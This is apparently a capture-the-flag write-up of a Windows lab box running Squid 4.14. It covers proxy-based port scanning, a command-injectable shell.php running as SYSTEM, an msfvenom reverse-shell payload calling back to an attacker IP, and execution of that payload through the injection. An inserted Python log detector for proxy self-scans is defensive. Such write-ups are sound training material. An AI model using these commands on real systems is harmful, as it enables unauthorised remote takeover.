🪟Squid

192.168.90.189

Enumeration

Used rustscan to find the initial port, then nmap to do a service scan, as scanning the whole box with Nmap was very slow.

Nmap scan

sudo nmap 192.168.90.189 -Pn -sV -p 3128  

Port 3128

Found Squid 4.14 running on this port.

Found that you can use the proxy to scan the machine's internal ports.
https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid
https://github.com/aancw/spose

Using curl to pull a webpage through the proxy.

curl --proxy http://192.168.90.189:3128 192.168.90.189:8080
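From the defender's side, the probing described above appears in Squid's access.log as one client requesting many different ports on the proxy's own address or on loopback. The following is an added example, not part of the original write-up, that flags such clients; the log lines are constructed, and the function names and the `min_ports` threshold are assumptions.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in Squid's native access.log format (not taken from the box).
SAMPLE_LOG = """\
1700000000.101 3 192.168.49.90 TCP_MISS/503 4012 GET http://192.168.90.189:21/ - HIER_DIRECT/192.168.90.189 text/html
1700000000.140 2 192.168.49.90 TCP_MISS/503 4012 GET http://192.168.90.189:22/ - HIER_DIRECT/192.168.90.189 text/html
1700000000.180 9 192.168.49.90 TCP_MISS/200 1530 GET http://192.168.90.189:8080/ - HIER_DIRECT/192.168.90.189 text/html
1700000000.220 1 192.168.49.90 TCP_DENIED/403 3900 CONNECT 127.0.0.1:3306 - HIER_NONE/- text/html
1700000000.260 2 192.168.49.90 TCP_MISS/503 4012 GET http://localhost:445/ - HIER_DIRECT/127.0.0.1 text/html
1700000001.000 88 192.168.49.77 TCP_MISS/200 9120 GET http://example.com/index.html - HIER_DIRECT/203.0.113.10 text/html
1700000002.000 5 192.168.49.77 TCP_MISS/200 812 GET http://192.168.90.189:8080/ - HIER_DIRECT/192.168.90.189 text/html
"""

def target_of(url):
    """Return (host, port) for a logged URL; CONNECT lines log a bare host:port."""
    try:
        parts = urlsplit(url if "://" in url else "//" + url)
        port = parts.port
    except ValueError:  # malformed host or port in the request
        return None, None
    return parts.hostname, port or {"http": 80, "https": 443}.get(parts.scheme)

def is_proxy_itself(host, proxy_addrs):
    """True if the requested host is the proxy's own address or loopback."""
    if host is None:
        return False
    if host == "localhost" or host in proxy_addrs:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:  # a DNS name, not an IP literal
        return False

def find_self_scans(log_text, proxy_addrs, min_ports=5):
    """Map client IP -> sorted ports it requested on the proxy host itself."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 7:
            continue  # not a native-format access.log line
        host, port = target_of(f[6])
        if port is not None and is_proxy_itself(host, proxy_addrs):
            seen[f[2]].add(port)  # f[2] is the client address
    return {c: sorted(p) for c, p in seen.items() if len(p) >= min_ports}

if __name__ == "__main__":
    print(find_self_scans(SAMPLE_LOG, {"192.168.90.189"}))
```

Denied requests are counted as well as successful ones, since a refused port is still evidence of probing.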

Ran dirbuster through the proxy and found some interesting pages. Added a proxy in foxyproxy which let me view the web pages.

Dirbuster found an interesting page.

The page says undefined cmd in shell.php, which would be using the system function. 😈 Added ?cmd=whoami

Confirmed command injection. Also confirmed this is running as nt authority\system so a reverse shell from here would land straight to root... or nt authority\system.

Made a reverse shell exe with msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.90 LPORT=6699 --platform windows -a x64 -e x64/xor -f exe -o shell2.exe

Curled the shell onto the machine by cmd injection.

Confirmed the file was there. Had to send shell2.exe after the picture above because I messed up the first msfvenom command.

Ran the file by sending the cmd for the exe in the browser.

Root
